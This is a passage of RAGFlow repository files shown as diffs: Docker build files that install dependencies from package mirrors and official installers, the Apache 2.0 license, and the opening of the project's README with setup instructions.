+ # Building C extensions: libpython3-dev libgtk-4-1 libnss3 xdg-utils libgbm-dev
47
+ RUN --mount=type=cache,id=ragflow_apt,target=/var/cache/apt,sharing=locked \
48
+ if [ "$NEED_MIRROR" == "1" ]; then \
49
+ sed -i 's|http://archive.ubuntu.com|https://mirrors.tuna.tsinghua.edu.cn|g' /etc/apt/sources.list; \
50
+ fi; \
51
+ rm -f /etc/apt/apt.conf.d/docker-clean && \
52
+ echo 'Binary::apt::APT::Keep-Downloaded-Packages "true";' > /etc/apt/apt.conf.d/keep-cache && \
53
+ chmod 1777 /tmp && \
54
+ apt update && \
55
+ apt --no-install-recommends install -y ca-certificates && \
56
+ apt update && \
57
+ apt install -y libglib2.0-0 libglx-mesa0 libgl1 && \
58
+ apt install -y pkg-config libicu-dev libgdiplus && \
59
+ apt install -y default-jdk && \
60
+ apt install -y libatk-bridge2.0-0 && \
61
+ apt install -y libpython3-dev libgtk-4-1 libnss3 xdg-utils libgbm-dev && \
62
+ apt install -y python3-pip pipx nginx unzip curl wget git vim less
63
+
64
+ RUN if [ "$NEED_MIRROR" == "1" ]; then \
65
+ pip3 config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple && \
66
+ pip3 config set global.trusted-host pypi.tuna.tsinghua.edu.cn; \
67
+ mkdir -p /etc/uv && \
68
+ echo "[[index]]" > /etc/uv/uv.toml && \
69
+ echo 'url = "https://pypi.tuna.tsinghua.edu.cn/simple"' >> /etc/uv/uv.toml && \
70
+ echo "default = true" >> /etc/uv/uv.toml; \
71
+ fi; \
72
+ pipx install uv
73
+
74
+ ENV PYTHONDONTWRITEBYTECODE=1 DOTNET_SYSTEM_GLOBALIZATION_INVARIANT=1
75
+ ENV PATH=/root/.local/bin:$PATH
76
+
77
+ # nodejs 12.22 on Ubuntu 22.04 is too old
78
+ RUN --mount=type=cache,id=ragflow_apt,target=/var/cache/apt,sharing=locked \
79
+ curl -fsSL https://deb.nodesource.com/setup_20.x | bash - && \
80
+ apt purge -y nodejs npm cargo && \
81
+ apt autoremove -y && \
82
+ apt update && \
83
+ apt install -y nodejs
84
+
85
+ # A modern version of cargo is needed for the latest version of the Rust compiler.
86
+ RUN apt update && apt install -y curl build-essential \
87
+ && if [ "$NEED_MIRROR" == "1" ]; then \
88
+ # Use TUNA mirrors for rustup/rust dist files
89
+ export RUSTUP_DIST_SERVER="https://mirrors.tuna.tsinghua.edu.cn/rustup"; \
90
+ export RUSTUP_UPDATE_ROOT="https://mirrors.tuna.tsinghua.edu.cn/rustup/rustup"; \
91
+ echo "Using TUNA mirrors for Rustup."; \
92
+ fi; \
93
+ # Force curl to use HTTP/1.1
94
+ curl --proto '=https' --tlsv1.2 --http1.1 -sSf https://sh.rustup.rs | bash -s -- -y --profile minimal \
95
+ && echo 'export PATH="/root/.cargo/bin:${PATH}"' >> /root/.bashrc
96
+
97
+ ENV PATH="/root/.cargo/bin:${PATH}"
98
+
99
+ RUN cargo --version && rustc --version
100
+
101
+ # Add mssql ODBC driver
102
+ # On ARM64 (e.g., macOS/Apple Silicon), install msodbcsql18.
103
+ # On general x86_64 environments, install msodbcsql17.
104
+ RUN --mount=type=cache,id=ragflow_apt,target=/var/cache/apt,sharing=locked \
105
+ curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add - && \
106
+ curl https://packages.microsoft.com/config/ubuntu/22.04/prod.list > /etc/apt/sources.list.d/mssql-release.list && \
107
+ apt update && \
108
+ arch="$(uname -m)"; \
109
+ if [ "$arch" = "arm64" ] || [ "$arch" = "aarch64" ]; then \
110
+ # ARM64 (macOS/Apple Silicon or Linux aarch64)
111
+ ACCEPT_EULA=Y apt install -y unixodbc-dev msodbcsql18; \
112
+ else \
113
+ # x86_64 or others
114
+ ACCEPT_EULA=Y apt install -y unixodbc-dev msodbcsql17; \
115
+ fi || \
116
+ { echo "Failed to install ODBC driver"; exit 1; }
117
+
118
+
119
+
120
+ # Add dependencies of selenium
121
+ RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/chrome-linux64-121-0-6167-85,target=/chrome-linux64.zip \
122
+ unzip /chrome-linux64.zip && \
123
+ mv chrome-linux64 /opt/chrome && \
124
+ ln -s /opt/chrome/chrome /usr/local/bin/
125
+ RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/chromedriver-linux64-121-0-6167-85,target=/chromedriver-linux64.zip \
126
+ unzip -j /chromedriver-linux64.zip chromedriver-linux64/chromedriver && \
127
+ mv chromedriver /usr/local/bin/ && \
128
+ rm -f /usr/bin/google-chrome
129
+
130
+ # https://forum.aspose.com/t/aspose-slides-for-net-no-usable-version-of-libssl-found-with-linux-server/271344/13
131
+ # aspose-slides on linux/arm64 is unavailable
132
+ RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/,target=/deps \
133
+ if [ "$(uname -m)" = "x86_64" ]; then \
134
+ dpkg -i /deps/libssl1.1_1.1.1f-1ubuntu2_amd64.deb; \
135
+ elif [ "$(uname -m)" = "aarch64" ]; then \
136
+ dpkg -i /deps/libssl1.1_1.1.1f-1ubuntu2_arm64.deb; \
137
+ fi
138
+
139
+
140
+ # builder stage
141
+ FROM base AS builder
142
+ USER root
143
+
144
+ WORKDIR /ragflow
145
+
146
+ # install dependencies from uv.lock file
147
+ COPY pyproject.toml uv.lock ./
148
+
149
+ # https://github.com/astral-sh/uv/issues/10462
150
+ # uv records index url into uv.lock but doesn't failover among multiple indexes
151
+ RUN --mount=type=cache,id=ragflow_uv,target=/root/.cache/uv,sharing=locked \
152
+ if [ "$NEED_MIRROR" == "1" ]; then \
153
+ sed -i 's|pypi.org|pypi.tuna.tsinghua.edu.cn|g' uv.lock; \
154
+ else \
155
+ sed -i 's|pypi.tuna.tsinghua.edu.cn|pypi.org|g' uv.lock; \
156
+ fi; \
157
+ if [ "$LIGHTEN" == "1" ]; then \
158
+ uv sync --python 3.10 --frozen; \
159
+ else \
160
+ uv sync --python 3.10 --frozen --all-extras; \
161
+ fi
162
+
163
+ COPY web web
164
+ COPY docs docs
165
+ RUN --mount=type=cache,id=ragflow_npm,target=/root/.npm,sharing=locked \
166
+ cd web && npm install && npm run build
167
+
168
+ COPY .git /ragflow/.git
169
+
170
+ RUN version_info=$(git describe --tags --match=v* --first-parent --always); \
171
+ if [ "$LIGHTEN" == "1" ]; then \
172
+ version_info="$version_info slim"; \
173
+ else \
174
+ version_info="$version_info full"; \
175
+ fi; \
176
+ echo "RAGFlow version: $version_info"; \
177
+ echo $version_info > /ragflow/VERSION
178
+
179
+ # production stage
180
+ FROM base AS production
181
+ USER root
182
+
183
+ WORKDIR /ragflow
184
+
185
+ # Copy Python environment and packages
186
+ ENV VIRTUAL_ENV=/ragflow/.venv
187
+ COPY --from=builder ${VIRTUAL_ENV} ${VIRTUAL_ENV}
188
+ ENV PATH="${VIRTUAL_ENV}/bin:${PATH}"
189
+
190
+ ENV PYTHONPATH=/ragflow/
191
+
192
+ COPY web web
193
+ COPY api api
194
+ COPY conf conf
195
+ COPY deepdoc deepdoc
196
+ COPY rag rag
197
+ COPY agent agent
198
+ COPY graphrag graphrag
199
+ COPY pyproject.toml uv.lock ./
200
+
201
+ COPY docker/service_conf.yaml.template ./conf/service_conf.yaml.template
202
+ COPY docker/entrypoint.sh docker/entrypoint-parser.sh ./
203
+ RUN chmod +x ./entrypoint*.sh
204
+
205
+ # Copy compiled web pages
206
+ COPY --from=builder /ragflow/web/dist /ragflow/web/dist
207
+
208
+ COPY --from=builder /ragflow/VERSION /ragflow/VERSION
209
+ ENTRYPOINT ["./entrypoint.sh"]
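
For reference, the `NEED_MIRROR` and `LIGHTEN` build arguments declared at the top of this Dockerfile are exercised in tests.yml above; typical invocations look like:

```bash
# Slim image: LIGHTEN=1 skips bundling the embedding/reranker models
docker build --build-arg LIGHTEN=1 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
# Full image
docker build --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly .
```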
ragflow-main/Dockerfile.deps ADDED
@@ -0,0 +1,10 @@
1
+ # This builds an image that contains the resources needed by Dockerfile
2
+ #
3
+ FROM scratch
4
+
5
+ # Copy resources downloaded via download_deps.py
6
+ COPY chromedriver-linux64-121-0-6167-85 chrome-linux64-121-0-6167-85 cl100k_base.tiktoken libssl1.1_1.1.1f-1ubuntu2_amd64.deb libssl1.1_1.1.1f-1ubuntu2_arm64.deb tika-server-standard-3.0.0.jar tika-server-standard-3.0.0.jar.md5 libssl*.deb /
7
+
8
+ COPY nltk_data /nltk_data
9
+
10
+ COPY huggingface.co /huggingface.co
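
This deps image is what the main Dockerfile mounts as `infiniflow/ragflow_deps:latest`. A sketch of how it might be produced, assuming `download_deps.py` fetches the listed resources into the build context (its exact invocation is not shown in this upload):

```bash
# Hypothetical sequence; adjust to how download_deps.py is actually run
python3 download_deps.py
docker build -f Dockerfile.deps -t infiniflow/ragflow_deps:latest .
```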
ragflow-main/Dockerfile.scratch.oc9 ADDED
@@ -0,0 +1,60 @@
1
+ FROM opencloudos/opencloudos:9.0
2
+ USER root
3
+
4
+ WORKDIR /ragflow
5
+
6
+ RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel
7
+
8
+ RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
9
+ bash ~/miniconda.sh -b -p /root/miniconda3 && \
10
+ rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
11
+ echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
12
+ echo "conda activate base" >> ~/.bashrc
13
+
14
+ ENV PATH /root/miniconda3/bin:$PATH
15
+
16
+ RUN conda create -y --name py11 python=3.11
17
+
18
+ ENV CONDA_DEFAULT_ENV py11
19
+ ENV CONDA_PREFIX /root/miniconda3/envs/py11
20
+ ENV PATH $CONDA_PREFIX/bin:$PATH
21
+
22
+ # RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
23
+ RUN dnf install -y nodejs
24
+
25
+ RUN dnf install -y nginx
26
+
27
+ ADD ./web ./web
28
+ ADD ./api ./api
29
+ ADD ./docs ./docs
30
+ ADD ./conf ./conf
31
+ ADD ./deepdoc ./deepdoc
32
+ ADD ./rag ./rag
33
+ ADD ./requirements.txt ./requirements.txt
34
+ ADD ./agent ./agent
35
+ ADD ./graphrag ./graphrag
36
+
37
+ RUN dnf install -y openmpi openmpi-devel python3-openmpi
38
+ ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
39
+ ENV LD_LIBRARY_PATH /usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
40
+ RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
41
+ RUN cd ./web && npm i && npm run build
42
+ RUN conda run -n py11 pip install $(grep -ivE "mpi4py" ./requirements.txt) # without mpi4py==3.1.5
43
+ RUN conda run -n py11 pip install redis
44
+
45
+ RUN dnf update -y && \
46
+ dnf install -y glib2 mesa-libGL && \
47
+ dnf clean all
48
+
49
+ RUN conda run -n py11 pip install ollama
50
+ RUN conda run -n py11 python -m nltk.downloader punkt
51
+ RUN conda run -n py11 python -m nltk.downloader wordnet
52
+
53
+ ENV PYTHONPATH=/ragflow/
54
+ ENV HF_ENDPOINT=https://hf-mirror.com
55
+
56
+ COPY docker/service_conf.yaml.template ./conf/service_conf.yaml.template
57
+ ADD docker/entrypoint.sh ./entrypoint.sh
58
+ RUN chmod +x ./entrypoint.sh
59
+
60
+ ENTRYPOINT ["./entrypoint.sh"]
ragflow-main/LICENSE ADDED
@@ -0,0 +1,201 @@
1
+ Apache License
2
+ Version 2.0, January 2004
3
+ http://www.apache.org/licenses/
4
+
5
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6
+
7
+ 1. Definitions.
8
+
9
+ "License" shall mean the terms and conditions for use, reproduction,
10
+ and distribution as defined by Sections 1 through 9 of this document.
11
+
12
+ "Licensor" shall mean the copyright owner or entity authorized by
13
+ the copyright owner that is granting the License.
14
+
15
+ "Legal Entity" shall mean the union of the acting entity and all
16
+ other entities that control, are controlled by, or are under common
17
+ control with that entity. For the purposes of this definition,
18
+ "control" means (i) the power, direct or indirect, to cause the
19
+ direction or management of such entity, whether by contract or
20
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
21
+ outstanding shares, or (iii) beneficial ownership of such entity.
22
+
23
+ "You" (or "Your") shall mean an individual or Legal Entity
24
+ exercising permissions granted by this License.
25
+
26
+ "Source" form shall mean the preferred form for making modifications,
27
+ including but not limited to software source code, documentation
28
+ source, and configuration files.
29
+
30
+ "Object" form shall mean any form resulting from mechanical
31
+ transformation or translation of a Source form, including but
32
+ not limited to compiled object code, generated documentation,
33
+ and conversions to other media types.
34
+
35
+ "Work" shall mean the work of authorship, whether in Source or
36
+ Object form, made available under the License, as indicated by a
37
+ copyright notice that is included in or attached to the work
38
+ (an example is provided in the Appendix below).
39
+
40
+ "Derivative Works" shall mean any work, whether in Source or Object
41
+ form, that is based on (or derived from) the Work and for which the
42
+ editorial revisions, annotations, elaborations, or other modifications
43
+ represent, as a whole, an original work of authorship. For the purposes
44
+ of this License, Derivative Works shall not include works that remain
45
+ separable from, or merely link (or bind by name) to the interfaces of,
46
+ the Work and Derivative Works thereof.
47
+
48
+ "Contribution" shall mean any work of authorship, including
49
+ the original version of the Work and any modifications or additions
50
+ to that Work or Derivative Works thereof, that is intentionally
51
+ submitted to Licensor for inclusion in the Work by the copyright owner
52
+ or by an individual or Legal Entity authorized to submit on behalf of
53
+ the copyright owner. For the purposes of this definition, "submitted"
54
+ means any form of electronic, verbal, or written communication sent
55
+ to the Licensor or its representatives, including but not limited to
56
+ communication on electronic mailing lists, source code control systems,
57
+ and issue tracking systems that are managed by, or on behalf of, the
58
+ Licensor for the purpose of discussing and improving the Work, but
59
+ excluding communication that is conspicuously marked or otherwise
60
+ designated in writing by the copyright owner as "Not a Contribution."
61
+
62
+ "Contributor" shall mean Licensor and any individual or Legal Entity
63
+ on behalf of whom a Contribution has been received by Licensor and
64
+ subsequently incorporated within the Work.
65
+
66
+ 2. Grant of Copyright License. Subject to the terms and conditions of
67
+ this License, each Contributor hereby grants to You a perpetual,
68
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69
+ copyright license to reproduce, prepare Derivative Works of,
70
+ publicly display, publicly perform, sublicense, and distribute the
71
+ Work and such Derivative Works in Source or Object form.
72
+
73
+ 3. Grant of Patent License. Subject to the terms and conditions of
74
+ this License, each Contributor hereby grants to You a perpetual,
75
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76
+ (except as stated in this section) patent license to make, have made,
77
+ use, offer to sell, sell, import, and otherwise transfer the Work,
78
+ where such license applies only to those patent claims licensable
79
+ by such Contributor that are necessarily infringed by their
80
+ Contribution(s) alone or by combination of their Contribution(s)
81
+ with the Work to which such Contribution(s) was submitted. If You
82
+ institute patent litigation against any entity (including a
83
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
84
+ or a Contribution incorporated within the Work constitutes direct
85
+ or contributory patent infringement, then any patent licenses
86
+ granted to You under this License for that Work shall terminate
87
+ as of the date such litigation is filed.
88
+
89
+ 4. Redistribution. You may reproduce and distribute copies of the
90
+ Work or Derivative Works thereof in any medium, with or without
91
+ modifications, and in Source or Object form, provided that You
92
+ meet the following conditions:
93
+
94
+ (a) You must give any other recipients of the Work or
95
+ Derivative Works a copy of this License; and
96
+
97
+ (b) You must cause any modified files to carry prominent notices
98
+ stating that You changed the files; and
99
+
100
+ (c) You must retain, in the Source form of any Derivative Works
101
+ that You distribute, all copyright, patent, trademark, and
102
+ attribution notices from the Source form of the Work,
103
+ excluding those notices that do not pertain to any part of
104
+ the Derivative Works; and
105
+
106
+ (d) If the Work includes a "NOTICE" text file as part of its
107
+ distribution, then any Derivative Works that You distribute must
108
+ include a readable copy of the attribution notices contained
109
+ within such NOTICE file, excluding those notices that do not
110
+ pertain to any part of the Derivative Works, in at least one
111
+ of the following places: within a NOTICE text file distributed
112
+ as part of the Derivative Works; within the Source form or
113
+ documentation, if provided along with the Derivative Works; or,
114
+ within a display generated by the Derivative Works, if and
115
+ wherever such third-party notices normally appear. The contents
116
+ of the NOTICE file are for informational purposes only and
117
+ do not modify the License. You may add Your own attribution
118
+ notices within Derivative Works that You distribute, alongside
119
+ or as an addendum to the NOTICE text from the Work, provided
120
+ that such additional attribution notices cannot be construed
121
+ as modifying the License.
122
+
123
+ You may add Your own copyright statement to Your modifications and
124
+ may provide additional or different license terms and conditions
125
+ for use, reproduction, or distribution of Your modifications, or
126
+ for any such Derivative Works as a whole, provided Your use,
127
+ reproduction, and distribution of the Work otherwise complies with
128
+ the conditions stated in this License.
129
+
130
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
131
+ any Contribution intentionally submitted for inclusion in the Work
132
+ by You to the Licensor shall be under the terms and conditions of
133
+ this License, without any additional terms or conditions.
134
+ Notwithstanding the above, nothing herein shall supersede or modify
135
+ the terms of any separate license agreement you may have executed
136
+ with Licensor regarding such Contributions.
137
+
138
+ 6. Trademarks. This License does not grant permission to use the trade
139
+ names, trademarks, service marks, or product names of the Licensor,
140
+ except as required for reasonable and customary use in describing the
141
+ origin of the Work and reproducing the content of the NOTICE file.
142
+
143
+ 7. Disclaimer of Warranty. Unless required by applicable law or
144
+ agreed to in writing, Licensor provides the Work (and each
145
+ Contributor provides its Contributions) on an "AS IS" BASIS,
146
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147
+ implied, including, without limitation, any warranties or conditions
148
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149
+ PARTICULAR PURPOSE. You are solely responsible for determining the
150
+ appropriateness of using or redistributing the Work and assume any
151
+ risks associated with Your exercise of permissions under this License.
152
+
153
+ 8. Limitation of Liability. In no event and under no legal theory,
154
+ whether in tort (including negligence), contract, or otherwise,
155
+ unless required by applicable law (such as deliberate and grossly
156
+ negligent acts) or agreed to in writing, shall any Contributor be
157
+ liable to You for damages, including any direct, indirect, special,
158
+ incidental, or consequential damages of any character arising as a
159
+ result of this License or out of the use or inability to use the
160
+ Work (including but not limited to damages for loss of goodwill,
161
+ work stoppage, computer failure or malfunction, or any and all
162
+ other commercial damages or losses), even if such Contributor
163
+ has been advised of the possibility of such damages.
164
+
165
+ 9. Accepting Warranty or Additional Liability. While redistributing
166
+ the Work or Derivative Works thereof, You may choose to offer,
167
+ and charge a fee for, acceptance of support, warranty, indemnity,
168
+ or other liability obligations and/or rights consistent with this
169
+ License. However, in accepting such obligations, You may act only
170
+ on Your own behalf and on Your sole responsibility, not on behalf
171
+ of any other Contributor, and only if You agree to indemnify,
172
+ defend, and hold each Contributor harmless for any liability
173
+ incurred by, or claims asserted against, such Contributor by reason
174
+ of your accepting any such warranty or additional liability.
175
+
176
+ END OF TERMS AND CONDITIONS
177
+
178
+ APPENDIX: How to apply the Apache License to your work.
179
+
180
+ To apply the Apache License to your work, attach the following
181
+ boilerplate notice, with the fields enclosed by brackets "[]"
182
+ replaced with your own identifying information. (Don't include
183
+ the brackets!) The text should be enclosed in the appropriate
184
+ comment syntax for the file format. We also recommend that a
185
+ file or class name and description of purpose be included on the
186
+ same "printed page" as the copyright notice for easier
187
+ identification within third-party archives.
188
+
189
+ Copyright [yyyy] [name of copyright owner]
190
+
191
+ Licensed under the Apache License, Version 2.0 (the "License");
192
+ you may not use this file except in compliance with the License.
193
+ You may obtain a copy of the License at
194
+
195
+ http://www.apache.org/licenses/LICENSE-2.0
196
+
197
+ Unless required by applicable law or agreed to in writing, software
198
+ distributed under the License is distributed on an "AS IS" BASIS,
199
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200
+ See the License for the specific language governing permissions and
201
+ limitations under the License.
ragflow-main/README.md ADDED
@@ -0,0 +1,364 @@
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_tzh.md">繁体中文</a> |
11
+ <a href="./README_ja.md">日本語</a> |
12
+ <a href="./README_ko.md">한국어</a> |
13
+ <a href="./README_id.md">Bahasa Indonesia</a> |
14
+ <a href="/README_pt_br.md">Português (Brasil)</a>
15
+ </p>
16
+
17
+ <p align="center">
18
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
19
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
20
+ </a>
21
+ <a href="https://demo.ragflow.io" target="_blank">
22
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
23
+ </a>
24
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
25
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
26
+ </a>
27
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
28
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
29
+ </a>
30
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
31
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
32
+ </a>
33
+ </p>
34
+
35
+ <h4 align="center">
36
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
37
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
38
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
39
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
40
+ <a href="https://demo.ragflow.io">Demo</a>
41
+ </h4>
42
+
43
+ <details open>
44
+ <summary><b>📕 Table of Contents</b></summary>
45
+
46
+ - 💡 [What is RAGFlow?](#-what-is-ragflow)
47
+ - 🎮 [Demo](#-demo)
48
+ - 📌 [Latest Updates](#-latest-updates)
49
+ - 🌟 [Key Features](#-key-features)
50
+ - 🔎 [System Architecture](#-system-architecture)
51
+ - 🎬 [Get Started](#-get-started)
52
+ - 🔧 [Configurations](#-configurations)
53
+ - 🔧 [Build a docker image without embedding models](#-build-a-docker-image-without-embedding-models)
54
+ - 🔧 [Build a docker image including embedding models](#-build-a-docker-image-including-embedding-models)
55
+ - 🔨 [Launch service from source for development](#-launch-service-from-source-for-development)
56
+ - 📚 [Documentation](#-documentation)
57
+ - 📜 [Roadmap](#-roadmap)
58
+ - 🏄 [Community](#-community)
59
+ - 🙌 [Contributing](#-contributing)
60
+
61
+ </details>
62
+
63
+ ## 💡 What is RAGFlow?
64
+
65
+ [RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document
66
+ understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models)
67
+ to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted
68
+ data.
69
+
70
+ ## 🎮 Demo
71
+
72
+ Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
73
+
74
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
75
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
76
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
77
+ </div>
78
+
79
+ ## 🔥 Latest Updates
80
+
81
+ - 2025-02-05 Updates the model list of 'SILICONFLOW' and adds support for Deepseek-R1/DeepSeek-V3.
82
+ - 2025-01-26 Optimizes knowledge graph extraction and application, offering various configuration options.
83
+ - 2024-12-18 Upgrades Document Layout Analysis model in Deepdoc.
84
+ - 2024-12-04 Adds support for pagerank score in knowledge base.
85
+ - 2024-11-22 Adds more variables to Agent.
86
+ - 2024-11-01 Adds keyword extraction and related question generation to the parsed chunks to improve the accuracy of retrieval.
87
+ - 2024-08-22 Adds support for text-to-SQL statements through RAG.
88
+
89
+ ## 🎉 Stay Tuned
90
+
91
+ ⭐️ Star our repository to stay up-to-date with exciting new features and improvements! Get instant notifications for new
92
+ releases! 🌟
93
+
94
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
95
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
96
+ </div>
97
+
98
+ ## 🌟 Key Features
99
+
100
+ ### 🍭 **"Quality in, quality out"**
101
+
102
+ - [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated
103
+ formats.
104
+ - Finds "needle in a data haystack" of literally unlimited tokens.
105
+
106
+ ### 🍱 **Template-based chunking**
107
+
108
+ - Intelligent and explainable.
109
+ - Plenty of template options to choose from.
110
+
111
+ ### 🌱 **Grounded citations with reduced hallucinations**
112
+
113
+ - Visualization of text chunking to allow human intervention.
114
+ - Quick view of the key references and traceable citations to support grounded answers.
115
+
116
+ ### 🍔 **Compatibility with heterogeneous data sources**
117
+
118
+ - Supports Word, slides, Excel, txt, images, scanned copies, structured data, web pages, and more.
119
+
120
+ ### 🛀 **Automated and effortless RAG workflow**
121
+
122
+ - Streamlined RAG orchestration catered to both personal and large businesses.
123
+ - Configurable LLMs as well as embedding models.
124
+ - Multiple recall paired with fused re-ranking.
125
+ - Intuitive APIs for seamless integration with business.
126
+
127
+ ## 🔎 System Architecture
128
+
129
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
130
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
131
+ </div>
132
+
133
+ ## 🎬 Get Started
134
+
135
+ ### 📝 Prerequisites
136
+
137
+ - CPU >= 4 cores
138
+ - RAM >= 16 GB
139
+ - Disk >= 50 GB
140
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
141
+ > If you have not installed Docker on your local machine (Windows, Mac, or Linux),
142
+ > see [Install Docker Engine](https://docs.docker.com/engine/install/).
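+ >
+ > To confirm the installed versions, you can run:
+ >
+ > ```bash
+ > $ docker --version
+ > $ docker compose version
+ > ```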
143
+
144
+ ### 🚀 Start up the server
145
+
146
+ 1. Ensure `vm.max_map_count` >= 262144:
147
+
148
+ > To check the value of `vm.max_map_count`:
149
+ >
150
+ > ```bash
151
+ > $ sysctl vm.max_map_count
152
+ > ```
153
+ >
154
+ > Reset `vm.max_map_count` to a value of at least 262144 if it is not.
155
+ >
156
+ > ```bash
157
+ > # In this case, we set it to 262144:
158
+ > $ sudo sysctl -w vm.max_map_count=262144
159
+ > ```
160
+ >
161
+ > This change will be reset after a system reboot. To ensure your change remains permanent, add or update the
162
+ > `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
163
+ >
164
+ > ```bash
165
+ > vm.max_map_count=262144
166
+ > ```
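+ >
+ > To apply the value from **/etc/sysctl.conf** without rebooting, you can reload it:
+ >
+ > ```bash
+ > $ sudo sysctl -p
+ > ```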
167
+
168
+ 2. Clone the repo:
169
+
170
+ ```bash
171
+ $ git clone https://github.com/infiniflow/ragflow.git
172
+ ```
173
+
174
+ 3. Start up the server using the pre-built Docker images:
175
+
176
+ > The command below downloads the `v0.16.0-slim` edition of the RAGFlow Docker image. Refer to the following table for descriptions of different RAGFlow editions. To download a RAGFlow edition different from `v0.16.0-slim`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server. For example, set `RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0` for the full edition `v0.16.0`.
177
+
178
+ ```bash
179
+ $ cd ragflow
180
+ $ docker compose -f docker/docker-compose.yml up -d
181
+ ```
182
+
183
+ | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
184
+ |-------------------|-----------------|-----------------------|--------------------------|
185
+ | v0.16.0 | &approx;9 | :heavy_check_mark: | Stable release |
186
+ | v0.16.0-slim | &approx;2 | ❌ | Stable release |
187
+ | nightly | &approx;9 | :heavy_check_mark: | _Unstable_ nightly build |
188
+ | nightly-slim | &approx;2 | ❌ | _Unstable_ nightly build |
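+
+ For example, one way to switch to the full `v0.16.0` edition is to point `RAGFLOW_IMAGE` at it before starting the server. The one-liner below is only illustrative and assumes the variable is defined on a single `RAGFLOW_IMAGE=...` line in **docker/.env**; editing the file by hand works just as well:
+
+ ```bash
+ $ sed -i 's|^RAGFLOW_IMAGE=.*|RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0|' docker/.env
+ $ docker compose -f docker/docker-compose.yml up -d
+ ```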
189
+
190
+ 4. Check the server status after having the server up and running:
191
+
192
+ ```bash
193
+ $ docker logs -f ragflow-server
194
+ ```
195
+
196
+ _The following output confirms a successful launch of the system:_
197
+
198
+ ```bash
199
+
200
+ ____ ___ ______ ______ __
201
+ / __ \ / | / ____// ____// /____ _ __
202
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
203
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
204
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
205
+
206
+ * Running on all addresses (0.0.0.0)
207
+ * Running on http://127.0.0.1:9380
208
+ * Running on http://x.x.x.x:9380
209
+ INFO:werkzeug:Press CTRL+C to quit
210
+ ```
211
+
212
+ > If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anormal`
213
+ > error because, at that moment, your RAGFlow may not be fully initialized.
214
+
215
+ 5. In your web browser, enter the IP address of your server and log in to RAGFlow.
216
